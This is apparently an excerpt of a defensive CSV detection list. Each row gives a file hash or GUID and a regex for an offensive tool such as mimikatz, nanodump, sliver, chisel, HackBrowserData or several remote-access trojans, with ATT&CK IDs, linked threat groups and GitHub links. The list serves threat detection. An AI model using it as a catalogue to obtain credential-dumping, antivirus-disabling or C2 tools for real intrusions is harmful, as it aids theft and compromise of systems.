"*a8ddc05a5d82ab6abbf4f329fb508e1025a7dceabbe76d3639156009247792ea*",".{0,1000}a8ddc05a5d82ab6abbf4f329fb508e1025a7dceabbe76d3639156009247792ea.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","32782"
"*a8dee73ae0015fdfeaeb4b58514db089a5881f26e01e94c83d685771f2577be4*",".{0,1000}a8dee73ae0015fdfeaeb4b58514db089a5881f26e01e94c83d685771f2577be4.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","32783"
"*a8df39bb1afafa9ccc9e0dbd42c912fc17fc4da902b605b330a7705fa8da012c*",".{0,1000}a8df39bb1afafa9ccc9e0dbd42c912fc17fc4da902b605b330a7705fa8da012c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32784"
"*a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c*",".{0,1000}a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32785"
"*a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0*",".{0,1000}a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32787"
"*a8f1156a26f47cfc7c32d3c403f8d238011e80aa0b066cc2132a1b78e69d7eb5*",".{0,1000}a8f1156a26f47cfc7c32d3c403f8d238011e80aa0b066cc2132a1b78e69d7eb5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32790"
"*a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb*",".{0,1000}a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32791"
"*a8fca4711a214b5b154a7a9f31018bff0eb59ddc8dfe8bad04dde7f90972437a*",".{0,1000}a8fca4711a214b5b154a7a9f31018bff0eb59ddc8dfe8bad04dde7f90972437a.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","32794"
"*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*",".{0,1000}A8FE1F5C\-6B2A\-4417\-907F\-4F6EDE9C15A3.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","32795"
"*a9084eb399a2429615a76b1d33c22452ee5827d736d849744f5039368e8c0984*",".{0,1000}a9084eb399a2429615a76b1d33c22452ee5827d736d849744f5039368e8c0984.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32798"
"*a909221a35b3fda0f6149de8e58186909cd0efae15bbba614b9a15d4b7d15fd3*",".{0,1000}a909221a35b3fda0f6149de8e58186909cd0efae15bbba614b9a15d4b7d15fd3.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","32800"
"*A91421CB-7909-4383-BA43-C2992BBBAC22*",".{0,1000}A91421CB\-7909\-4383\-BA43\-C2992BBBAC22.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#GUIDproject","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","32801"
"*a91430b2ee1746fc061185f83393343b6bbb80f7501366da360cf687b7cb2ec6*",".{0,1000}a91430b2ee1746fc061185f83393343b6bbb80f7501366da360cf687b7cb2ec6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32802"
"*a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a*",".{0,1000}a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32804"
"*a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7*",".{0,1000}a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32806"
"*a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b*",".{0,1000}a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32807"
"*a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b*",".{0,1000}a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32808"
"*a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058*",".{0,1000}a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32809"
"*a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9*",".{0,1000}a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","32811"
"*A9386992-CFAC-468A-BD41-78382212E5B9*",".{0,1000}A9386992\-CFAC\-468A\-BD41\-78382212E5B9.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#GUIDproject","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","32812"
"*a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67*",".{0,1000}a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","32813"
"*a94219205d14a633058fcd7ea39d33525e07d8aea5411a21d79d4f8c01993b47*",".{0,1000}a94219205d14a633058fcd7ea39d33525e07d8aea5411a21d79d4f8c01993b47.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32814"
"*a9489baffe0c884e3ef759f05124e99864b3d4072c7011e71522a1197ed309a9*",".{0,1000}a9489baffe0c884e3ef759f05124e99864b3d4072c7011e71522a1197ed309a9.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","32815"
"*a949f0e018ba13b735bd96ed729672c72233f1c4a993eda2e60c301b42de1d7d*",".{0,1000}a949f0e018ba13b735bd96ed729672c72233f1c4a993eda2e60c301b42de1d7d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32816"
"*a94a0ca227f9719af8f6cc3c505fba9a63687013f513f6b8991f4f036475740f*",".{0,1000}a94a0ca227f9719af8f6cc3c505fba9a63687013f513f6b8991f4f036475740f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32817"
"*a95c6bd632b23c5bc2c7d9bcbe95b69e1392f2377232254402fe7d9568eee172*",".{0,1000}a95c6bd632b23c5bc2c7d9bcbe95b69e1392f2377232254402fe7d9568eee172.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32821"
"*a96b2bd4b84710a57b236090973820df7aea444d13a671ab573dd422c898dbe4*",".{0,1000}a96b2bd4b84710a57b236090973820df7aea444d13a671ab573dd422c898dbe4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32825"
"*a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357*",".{0,1000}a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32826"
"*A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA*",".{0,1000}A96C7C34\-5791\-43CF\-9F8B\-8EF5B3FB6EBA.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#GUIDproject","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","32827"
"*a96e22322b009000a8b0b8cf7229f4e40c36b260f1076f1c225c12a43613c405*",".{0,1000}a96e22322b009000a8b0b8cf7229f4e40c36b260f1076f1c225c12a43613c405.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","32828"
"*a976cdbaf7401fcf1de10254a4db2873b1b4c8c0b6f0e45a51978e3c77a6968a*",".{0,1000}a976cdbaf7401fcf1de10254a4db2873b1b4c8c0b6f0e45a51978e3c77a6968a.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","32830"
"*a97c94ee538d84474a794fdcf7e2f17735aeb7b62be66e1775ad396a4c5357a2*",".{0,1000}a97c94ee538d84474a794fdcf7e2f17735aeb7b62be66e1775ad396a4c5357a2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32831"
"*a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f*",".{0,1000}a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32832"
"*a9830d372873174b5e855d0ba4b0f14912e007657bfe0bdcddae7f10e0ea7a03*",".{0,1000}a9830d372873174b5e855d0ba4b0f14912e007657bfe0bdcddae7f10e0ea7a03.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32833"
"*a9843a81603f299fb87f371052b47798338252b58ad8ef56dfee4bf462322eb6*",".{0,1000}a9843a81603f299fb87f371052b47798338252b58ad8ef56dfee4bf462322eb6.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","32834"
"*a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699*",".{0,1000}a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32835"
"*a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699*",".{0,1000}a98576591e0e03e13239e35f8e02e30b71b6e4109f568a3d245af6ac67591699.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32836"
"*a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99*",".{0,1000}a98d565ced4a422049d3ff0ad22e9641af814a09187d5793b40899865733df99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32837"
"*a990a9014445fe722f63624197fc0f319dbfd1e16a9b7fdcb49c5a6443a29d4b*",".{0,1000}a990a9014445fe722f63624197fc0f319dbfd1e16a9b7fdcb49c5a6443a29d4b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32838"
"*a992acc4b4e48dd6cdc389dcaf2291b330854f0b17369b1429590d3f824c3dfe*",".{0,1000}a992acc4b4e48dd6cdc389dcaf2291b330854f0b17369b1429590d3f824c3dfe.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","32839"
"*a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039*",".{0,1000}a998e3aa58debd0797b430649420e49ca0b1299a005900dfaf17f661facfe039.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","32840"
"*a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916*",".{0,1000}a99b152752f479050ee12bde36fe6c85d3b07b0ee2b6e974abf287bfa2727916.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32841"
